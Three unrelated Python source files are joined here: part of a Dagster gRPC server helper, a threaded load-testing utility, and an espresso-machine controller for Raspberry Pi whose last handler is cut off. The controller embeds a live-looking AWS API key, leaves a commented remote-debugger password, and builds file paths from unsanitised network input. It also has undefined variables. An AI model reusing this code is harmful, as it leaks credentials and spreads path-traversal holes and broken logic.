server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
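# Minimal usage sketch (illustrative; "repo.py" and the worker count below are placeholders):
#
#   origin = LoadableTargetOrigin(executable_path=sys.executable, python_file="repo.py")
#   server = GrpcServerProcess(loadable_target_origin=origin, max_workers=2)
#   client = server.create_ephemeral_client()
#   client.ping("")   # same liveness check used by wait_for_grpc_server above
#   server.wait()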
|
async_time_test.py
|
# -*- coding: utf-8 -*-
'''
module: async_time_test
author: denis@ryzhkov.org
license: free
See «async_time_test.async_time_test» docstring.
'''
__all__ = [
'async_time_test',
]
__version__ = '0.4'
#### async_time_test
def async_time_test(actions_args=[], actions_per_second=1, action_time_limit_in_seconds=1, test_time_in_seconds=60, async=True):
'''
«async_time_test» is a tool for highload testing of asynchronous actions,
that must be completed successfully in some time limit.
Usage:
def action1():
do_some_payload1()
def action2():
do_some_payload2()
for async in False, True: # to compare stats
stats = async_time_test(
actions_args=[
dict(action=action1, actions_per_second=10),
dict(action=action2, actions_per_second=20),
],
action_time_limit_in_seconds=1,
test_time_in_seconds=60,
async=async,
)
# «action*» args can be passed per-action or per-test
from json import dumps
print(dumps(stats, indent=4))
# actions_count: {
# total: 1800,
# successful: 1000,
# failed: {
# total: 800,
# crashed: 10,
# timedout: 790,
# }},
# action_time_in_seconds: {
# min: 0.01,
# avg: 2,
# max: 30,
# },
# test_time_in_seconds: {
# expected: 60,
# real: 69,
# },
# async: False/True,
'''
#### import
from time import sleep
from time import time as clock # WARNING: seems like «clock» is spoiled by multi-threading on Debian
from threading import current_thread, Lock, Thread
#### actions_args init
for action_args in actions_args:
for arg in 'actions_per_second', 'action_time_limit_in_seconds':
action_args[arg] = action_args.get(arg, locals().get(arg, None)) # DRY combination of per-action args with per-test args and defaults
action_args['total_actions_count'] = int(test_time_in_seconds * action_args['actions_per_second'])
#### stats init
lock = Lock() # locks update of next values:
stats = dict(
actions_count=dict(
total=sum(action_args['total_actions_count'] for action_args in actions_args),
successful=0,
failed=dict(
total=0,
crashed=0,
timedout=0,
),
),
action_time_in_seconds=dict(
min=None,
avg=None,
max=None,
),
action_time_in_seconds_temporary_list=[],
test_time_in_seconds=dict(
expected=test_time_in_seconds,
real=None,
),
async=async,
)
#### single_runner
def single_runner(stats, action, action_time_limit_in_seconds):
is_crashed = False
start = clock()
try:
action()
except:
is_crashed = True
from traceback import print_exc
print_exc()
stop = clock()
action_time_in_seconds = stop - start
with lock:
stats['action_time_in_seconds_temporary_list'].append(action_time_in_seconds)
failed_stats = stats['actions_count']['failed']
if is_crashed:
failed_stats['crashed'] += 1
failed_stats['total'] += 1
elif action_time_in_seconds > action_time_limit_in_seconds:
failed_stats['timedout'] += 1
failed_stats['total'] += 1
else:
stats['actions_count']['successful'] += 1
#### group_runner
def group_runner(stats, action, total_actions_count, actions_per_second, action_time_limit_in_seconds):
single_threads = []
for single_index in range(total_actions_count):
sleep(1.0 / actions_per_second)
single_thread = Thread(target=single_runner, args=(stats, action, action_time_limit_in_seconds))
single_thread.start()
if async:
single_threads.append(single_thread)
else:
single_thread.join()
if async:
for single_thread in single_threads:
single_thread.join()
group_threads = [
Thread(target=group_runner, args=(stats, ), kwargs=action_args)
for action_args in actions_args
]
#### main thread
start = clock()
for group_thread in group_threads:
group_thread.start()
if not async:
group_thread.join()
if async:
for group_thread in group_threads:
group_thread.join()
stop = clock()
stats['test_time_in_seconds']['real'] = stop - start
#### process action-time-stats
time_list = stats['action_time_in_seconds_temporary_list']
if time_list:
time_stats = stats['action_time_in_seconds']
time_stats['min'] = min(time_list)
time_stats['avg'] = sum(time_list) / len(time_list)
time_stats['max'] = max(time_list)
del stats['action_time_in_seconds_temporary_list']
#### return
return stats
#### minimal tests
def run_tests():
#### prepare
from json import dumps
from random import randrange
from time import sleep
def payload(deviation=0):
one_second_factor = 10
sleep(float(randrange(
one_second_factor - deviation,
one_second_factor + deviation,
)) / one_second_factor)
if not randrange(10):
1/0
def action1():
payload(deviation=1)
def action2():
payload(deviation=2)
actions1_per_second = 10
actions2_per_second = 20
action_time_limit_in_seconds = 1
test_time_in_seconds = 1
#### run
for async in False, True: # to compare stats
stats = async_time_test(
actions_args=[
dict(action=action1, actions_per_second=actions1_per_second),
dict(action=action2, actions_per_second=actions2_per_second),
],
action_time_limit_in_seconds=action_time_limit_in_seconds,
test_time_in_seconds=test_time_in_seconds,
async=async,
)
print(dumps(stats, indent=4))
#### assert
count_stats = stats['actions_count']
assert count_stats['total'] == (actions1_per_second + actions2_per_second) * test_time_in_seconds
assert count_stats['total'] == count_stats['successful'] + count_stats['failed']['total']
assert count_stats['failed']['total'] == count_stats['failed']['crashed'] + count_stats['failed']['timedout']
time_stats = stats['action_time_in_seconds']
assert time_stats['min'] <= time_stats['avg'] <= time_stats['max']
if time_stats['max'] > action_time_limit_in_seconds:
assert count_stats['failed']['timedout'] > 0
print('tests passed')
if __name__ == '__main__':
run_tests()
####
|
ispresso.py
|
#!/usr/bin/python
# Copyright (c) 2013 Chris Synan & Dataworlds LLC
# Portions copyright (c) 2012 Stephen P. Smith
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The software is free for non-commercial uses. Commercial uses of this software
# or any derivative must obtain a license from Dataworlds LLC (Austin TX)
# In addition, the above copyright notice and this permission notice shall
# be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, time, shutil, logging, logging.handlers, traceback
import threading, subprocess, requests
import urllib3.contrib.pyopenssl
import multiprocessing
from multiprocessing import Process, Pipe, Queue, Value, current_process
from subprocess import Popen, PIPE, call, signal
from datetime import datetime
from shutil import copy2
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
import web, random, json, atexit
from pid import pidpy as PIDController
import RPi.GPIO as GPIO
#from lcd import lcddriver
import glob
# logging.basicConfig()
logger = logging.getLogger('ispresso')
# REMOTE DEBUG -- TODO: Remove this before going to production
# import rpdb2
# rpdb2.start_embedded_debugger('funkymonkey', fAllowRemote = True)
gpio_heat = 12
gpio_btn_heat_led = 5
gpio_btn_heat_sig = 6
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpio_btn_heat_sig, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(gpio_heat, GPIO.OUT)
GPIO.setup(gpio_btn_heat_led, GPIO.OUT)
def logger_init():
logger.setLevel(logging.DEBUG)
log_file_size = 1024 * 1024 * 1 # 1 MB
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(process)d - %(name)s : %(message)s')
fh = logging.handlers.RotatingFileHandler('/var/log/ispresso.log', maxBytes=log_file_size, backupCount=5)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('******************************************')
logger.info('Starting up...')
def initialize():
settings.load()
if setup.wifi_connect() == False: # this needs to happen after lcd pipe is set up
logger.warn("WiFi can't connect to internet. Entering Smart Connect mode. Connect to iSPRESSO wireless network.")
#mem.lcd_connection.send(["iSPRESSO WiFi", "Access Point", 0])
setup.smart_connect()
else:
logger.info("WiFi connection looks ok")
#mem.lcd_connection.send(["iSPRESSO", "WiFi OK", 3])
#mem.lcd_connection.send(["iSPRESSO", "", 0])
class mem: # global class
cache_day = None
cache_start_time = None
cache_end_time = None
heat_connection = Pipe()
#lcd_connection = Pipe()
brew_connection = Pipe()
cloud_connection = Pipe()
flag_pump_on = False
sched_flag_on = False
sched_flag_off = False
time_heat_button_pressed = time.time()
scheduler_enabled = True
presoak_time = 3
wait_time = 2
brew_time = 25
one_wire = None
class globalvars(object):
def __init__(self, initval = 0):
self.temperature = multiprocessing.Value("i", initval)
def set_temp(self, n=0):
with self.temperature.get_lock():
self.temperature.value = n
@property
def temp(self):
with self.temperature.get_lock():
return self.temperature.value
class param:
mode = "off"
cycle_time = 2.0
duty_cycle = 0.0
set_point = 655
k_param = 6 # was 6
i_param = 60 # was 120
d_param = 15 # was 5
def add_global_hook(parent_conn, statusQ):
# mem.heat_connection = parent_conn
g = web.storage({"parent_conn" : parent_conn, "statusQ" : statusQ})
def _wrapper(handler):
web.ctx.globals = g
return handler()
return _wrapper
class advanced:
def __init__(self):
self.mode = param.mode
self.cycle_time = param.cycle_time
self.duty_cycle = param.duty_cycle
self.set_point = param.set_point
self.k_param = param.k_param
self.i_param = param.i_param
self.d_param = param.d_param
def GET(self):
return render.advanced(self.mode, self.set_point, self.duty_cycle, self.cycle_time, self.k_param, self.i_param, self.d_param)
def POST(self):
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "mode":
self.mode = datalistkey[1]
if datalistkey[0] == "setpoint":
self.set_point = float(datalistkey[1])
if datalistkey[0] == "dutycycle":
self.duty_cycle = float(datalistkey[1])
if datalistkey[0] == "cycletime":
self.cycle_time = float(datalistkey[1])
if datalistkey[0] == "k":
self.k_param = float(datalistkey[1])
if datalistkey[0] == "i":
self.i_param = float(datalistkey[1])
if datalistkey[0] == "d":
self.d_param = float(datalistkey[1])
param.mode = self.mode
param.cycle_time = self.cycle_time
param.duty_cycle = self.duty_cycle
param.set_point = self.set_point
param.k_param = self.k_param
param.i_param = self.i_param
param.d_param = self.d_param
settings.save()
web.ctx.globals.parent_conn.send([self.mode, self.cycle_time, self.duty_cycle, self.set_point, self.k_param, self.i_param, self.d_param, False])
def gettempProc(global_vars, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("getTempProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
t = time.time()
time.sleep(0.5) # .1+~.83 = ~1.33 seconds
num = tempdata()
elapsed = "%.2f" % (time.time() - t)
conn.send([num, elapsed])
fah = (9.0 / 5.0) * num + 32
global_vars.set_temp(int(fah)) # convert to int before storing the global var
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def getonofftime(cycle_time, duty_cycle):
duty = duty_cycle / 100.0
on_time = cycle_time * (duty)
off_time = cycle_time * (1.0 - duty)
return [on_time, off_time]
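# Worked example: getonofftime(2.0, 25.0) -> [0.5, 1.5], i.e. with a 2 s cycle at 25% duty cycle
# the heater is driven HIGH for 0.5 s and LOW for 1.5 s on each pass through heatProc.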
def tellHeatProc(heat_mode=None, flush_cache=None):
if flush_cache is None:
flush_cache = False
if heat_mode is not None:
param.mode = heat_mode
mem.heat_connection.send([param.mode, param.cycle_time, param.duty_cycle, param.set_point, param.k_param, param.i_param, param.d_param, flush_cache])
def heatProc(cycle_time, duty_cycle, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("heatProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
while (conn.poll()): # get last
cycle_time, duty_cycle = conn.recv()
conn.send([cycle_time, duty_cycle])
if duty_cycle == 0:
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(cycle_time)
elif duty_cycle == 100:
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(cycle_time)
else:
on_time, off_time = getonofftime(cycle_time, duty_cycle)
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(on_time)
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(off_time)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
# LCD support is disabled in this build (the lcddriver import above is commented out), so the
# whole handler is kept commented out to preserve the original intent without breaking parsing.
# def lcdControlProc(lcd_child_conn):
#     p = current_process()
#     logger = logging.getLogger("ispresso").getChild("lcdControlProc")
#     logger.info('Starting:' + p.name + ":" + str(p.pid))
#     lcd = lcddriver.lcd()
#     last_line1 = ""
#     last_line2 = ""
#     while (True):
#         time.sleep(0.25)
#         while lcd_child_conn.poll():
#             try:
#                 line1, line2, duration = lcd_child_conn.recv()
#                 if line1 is not None:
#                     if last_line1 != line1:
#                         lcd.lcd_display_string(line1.ljust(16), 1)
#                         last_line1 = line1
#                     time.sleep(duration)
#                 if line2 is not None:
#                     if last_line2 != line2:
#                         lcd.lcd_display_string(line2.ljust(16), 2)
#                         last_line2 = line2
#                     time.sleep(duration)
#             except:
#                 exc_type, exc_value, exc_traceback = sys.exc_info()
#                 logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
#                 subprocess.call(['i2cdetect', '-y', '1'])
#                 try:
#                     lcd = None
#                     time.sleep(0.1)
#                     lcd = lcddriver.lcd()
#                     time.sleep(0.1)
#                 except:
#                     logger.error("Trying to re-initialize the LCD by nulling it out and re-instantiating. Couldn't pull it off :(")
#                     continue
def brewControlProc(brew_child_conn):
p = current_process()
logger = logging.getLogger("ispresso").getChild("brewControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
mem.flag_pump_on = False
button_bounce_threshold_secs = 1
while(True):
time_button_pushed, brew_plan = brew_child_conn.recv() # BLOCKS until something shows up
mem.flag_pump_on = True
for listitem in brew_plan:
if mem.flag_pump_on == False:
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
break
action = listitem[0]
duration = listitem[1]
counter = 0
start_time = time.time()
if action.upper() in ("PRESOAK", "BREW"):
GPIO.output(gpio_btn_pump_led, GPIO.HIGH)
GPIO.output(gpio_pump, GPIO.HIGH)
while ((counter < duration) & mem.flag_pump_on) : # might not need the check for flag_pump_on here, as its above
time.sleep(0.1)
if brew_child_conn.poll(): # mem.brew_connection.poll() returns TRUE or FALSE immediately and does NOT block
time_button_pushed_again, throwaway_brew_plan = brew_child_conn.recv() # get item off the list, check how long since time_button_pushed, against button_bounce_threshold_secs. If too short, clean up and exit this loop
if time_button_pushed_again - time_button_pushed > button_bounce_threshold_secs:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.flag_pump_on = False
mem.lcd_connection.send([None, "", 0])
break
if (time.time() - start_time) >= counter:
counter = counter + 1
message = action + 'ing ' + str(duration - counter) + 's'
                            # mem.lcd_connection.send([None, message, 0])  # LCD support is disabled above
logger.debug(message)
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
                # mem.lcd_connection.send([None, '', 0])  # LCD support is disabled above
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
finally:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
def cloudControlProc(global_vars, brew_conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("cloudControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
last_cmd_time = time.time()
secs_cmd_interval = 1.25
echoUserId = ""
# TODO: fetch userId from file on startup - also means we have to bounce the service when set from /echo POST
try:
with open("echo.json") as readFile:
my_settings = json.load(readFile)
echoUserId = my_settings["userId"]
except (IOError, ValueError):
logger.debug("Killing cloud process as we don't have a valid echoUserId")
return False # EXIT if we don't have a valid echoUserId - no sense racking up an AWS bill if we don't need to!
if not setup.check_connected():
logger.debug("Killing cloud process as we are not connected to internet")
return False # not going to keep this process running if we are not connected to internet.
if echoUserId == "":
logger.debug("Killing cloud process as we still don't have a valid echoUserId")
return False
logger.debug("Starting main loop with echoUserId = " + echoUserId)
while True:
time.sleep(0.1)
now_time = time.time()
if now_time - last_cmd_time > secs_cmd_interval:
last_cmd_time = now_time
try:
temp = global_vars.temp
url = 'https://ltqynxd6pc.execute-api.us-east-1.amazonaws.com/prod/ispresso-cloud-status-command' # post status to AWS, check for a command. Delete command from AWS. Execute command here
payload = {'echoUserId': echoUserId, 'temp': temp, 'temp_unit' : ' Fahrenheit'}
payload = json.dumps(payload)
headers = {'x-api-key': 'FqwN8fidPq7vvPTPcsOHd2V0BtAd17768Kq8UPM5'}
resp = requests.post(url, data=payload, headers=headers)
data = json.loads(resp.text)
if len(data.keys()) > 0: #[0] == "Item":
logger.debug("Received payload from AWS: " + str(data))
command = data["Item"]["command"]
currenttime = data["Item"]["currenttime"]
commandtime = data["Item"]["datetime"]
logger.debug("command = " + command)
if command == "brew":
# check to see if not too much time has passed from command to current time
min_diff = round((currenttime - commandtime) / 60000) ;
if min_diff > 1:
logger.error("Command is " + str(min_diff) + " minutes old! ")
else:
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
brew_conn.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def tempControlProc(global_vars, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param, statusQ, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("tempControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
parent_conn_temp, child_conn_temp = Pipe()
ptemp = Process(name="gettempProc", target=gettempProc, args=(global_vars, child_conn_temp,))
ptemp.daemon = True
ptemp.start()
parent_conn_heat, child_conn_heat = Pipe()
pheat = Process(name="heatProc", target=heatProc, args=(cycle_time, duty_cycle, child_conn_heat))
pheat.daemon = True
pheat.start()
pid = PIDController.pidpy(cycle_time, k_param, i_param, d_param) # init pid
flush_cache = False
last_temp_C = 0
while (True):
time.sleep(0.1)
readytemp = False
while parent_conn_temp.poll():
temp_C, elapsed = parent_conn_temp.recv() # non blocking receive
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off -- MOVING THIS as the OFF doesnt seem to fire..
if temp_C > 0: # the 1-wire sensor sometimes comes back with 0 -- need to fix that by holding on to last value.
last_temp_C = temp_C
else:
temp_C = last_temp_C
temp_F = (9.0 / 5.0) * temp_C + 32
temp_C_str = "%3.2f" % temp_C
temp_F_str = "%3.2f" % temp_F
temp_F_pretty = "%3.0f" % temp_F
                # mem.lcd_connection.send(['iSPRESSO ' + str(temp_F_pretty) + ' F', None, 0])  # LCD support is disabled above
readytemp = True
if readytemp == True:
if mode == "auto":
duty_cycle = pid.calcPID_reg4(temp_F, set_point, True)
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.HIGH)
elif mode == "off":
duty_cycle = 0
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
if (not statusQ.full()):
statusQ.put([temp_F_str, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param]) # GET request
                readytemp = False
while parent_conn_heat.poll(): # non blocking receive
cycle_time, duty_cycle = parent_conn_heat.recv()
while conn.poll(): # POST settings
mode, cycle_time, duty_cycle_temp, set_point, k_param, i_param, d_param, flush_cache = conn.recv()
if flush_cache:
mem.cache_day = None # this should force cache flush
flush_cache = False
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class getstatus:
def __init__(self):
pass
def GET(self): # blocking receive
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out
def POST(self):
pass
@staticmethod
def get_temp():
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out["temp"]
class echo:
def GET(self):
mystring = "{}"
try:
with open("echo.json") as f:
filecontents = json.load(f)
mystring = json.dumps(filecontents)
except (IOError, ValueError):
open("echo.json", 'a').close()
return render.echo(mystring) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
echoUserId = ""
try:
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "userId":
echoUserId = mydata[datalistkey]
logger.debug("Echo userId changing to " + str(mydata[datalistkey]))
with open("echo.json") as saveFile:
try:
my_settings = json.load(saveFile)
except ValueError:
my_settings = json.loads("{}")
my_settings['userId'] = echoUserId
logger.debug("Echo config updating: " + str(mydata))
with open("echo.json", "wb") as output_file:
json.dump(my_settings, output_file)
return json.dumps("OK")
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class settings:
def GET(self):
with open("settings.json") as f:
filecontents = json.load(f)
return render.settings(json.dumps(filecontents)) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "temp":
param.set_point = int(mydata[datalistkey])
logger.debug("temp changed to " + str(mydata[datalistkey]))
if datalistkey == "brewSecs":
mem.brew_time = int(mydata[datalistkey])
logger.debug("brew secs changed")
if datalistkey == "soakSecs":
mem.presoak_time = int(mydata[datalistkey])
logger.debug("soak secs changed")
if datalistkey == "waitSecs":
mem.wait_time = int(mydata[datalistkey])
logger.debug("wait secs changed")
logger.debug("Settings updated: " + str(mydata))
settings.save()
@staticmethod
def load():
with open("settings.json") as loadFile:
my_settings = json.load(loadFile)
mem.brew_time = my_settings["brewSecs"]
mem.presoak_time = my_settings["soakSecs"]
mem.wait_time = my_settings["waitSecs"]
param.set_point = my_settings["temp"]
param.k_param = my_settings["p_value"]
param.i_param = my_settings["i_value"]
param.d_param = my_settings["d_value"]
@staticmethod
def save():
with open("settings.json") as saveFile:
my_settings = json.load(saveFile)
my_settings['brewSecs'] = mem.brew_time
my_settings['soakSecs'] = mem.presoak_time
my_settings['waitSecs'] = mem.wait_time
my_settings['temp'] = param.set_point
my_settings['p_value'] = param.k_param
my_settings['i_value'] = param.i_param
my_settings['d_value'] = param.d_param
logger.debug("About to save settings = " + str(my_settings))
with open("settings.json", "wb") as output_file:
json.dump(my_settings, output_file)
class ispresso:
def GET(self):
return render.ispresso()
def POST(self):
op = ""
flag = ""
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "operation":
op = datalistkey[1]
if datalistkey[0] == "flag":
flag = datalistkey[1]
if str(op).upper() == "HEAT":
if flag == "on":
tellHeatProc("auto")
else:
tellHeatProc("off")
elif str(op).upper() == "PUMP":
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def brew(self):
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("called brew method ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def scheduled_mode(old_mode):
try:
now = datetime.now()
today = datetime.isoweekday(datetime.now())
if today == 7:
today = 0
if mem.cache_day is None or mem.cache_day != today: # refresh cache, reset flags, turn off heat
logger.debug("scheduled_mode: cache flush or new day. resetting flags, turning off heat.")
mem.cache_day = today
mem.sched_flag_off = False
mem.sched_flag_on = False
with open("schedule.json") as f:
my_schedule = json.load(f) # t= time.strptime("00:05:42.244", "%H:%M:%S")
mem.cache_start_time = my_schedule['days'][today]['time']['startTime']
mem.cache_start_time = now.replace(hour=int(mem.cache_start_time.split(":")[0]), minute=int(mem.cache_start_time.split(":")[1]))
mem.cache_end_time = my_schedule['days'][today]['time']['endTime']
mem.cache_end_time = now.replace(hour=int(mem.cache_end_time.split(":")[0]), minute=int(mem.cache_end_time.split(":")[1]))
return "off"
if now < mem.cache_start_time:
return old_mode
if now > mem.cache_start_time and now < mem.cache_end_time:
if mem.sched_flag_on:
return old_mode
else: # start flag NOT set
mem.sched_flag_on = True # set flag
logger.debug("scheduled_mode: going AUTO")
return "auto"
if now > mem.cache_end_time:
if mem.sched_flag_off:
return old_mode
else: # end flag NOT set
mem.sched_flag_off = True # set end flag
logger.debug("scheduled_mode: going OFF")
return "off"
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
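# Shape of schedule.json implied by the lookups above (day indexes run Sunday=0 .. Saturday=6;
# the times shown are only illustrative):
#   {"days": [{"time": {"startTime": "06:30", "endTime": "09:00"}}, ...]}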
class setup:
def GET(self):
try:
mySsidList = setup.get_ssid_list()
return render.setup(mySsidList)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def POST(self): # catch the inputs, put them into a config file, then call a shell script
try:
input = web.input()
protocol = input.protocol
ssid = input.ssid
passwd = input.passwd
if protocol == "personal":
logger.debug("doing config for WPA personal. ssid = " + ssid)
with open('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = ' wpa-psk "' + passwd + '"\n'
if line.find("pre-up") > -1:
lines[idx] = ' # pre-up wpa_supplicant \n'
if line.find("post-down") > -1:
lines[idx] = ' # post-down # wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
elif protocol == "enterprise":
mycert = web.input(ca_cert={})
filename = ""
filedir = '/etc/certs/' # change this to the directory you want to store the file in.
if 'ca_cert' in mycert: # to check if the file-object is created
filepath = mycert.ca_cert.filename.replace('\\', '/') # replaces the windows-style slashes with linux ones.
filename = filepath.split('/')[-1] # splits the and chooses the last part (the filename with extension)
filename = filedir + filename # put together with my path
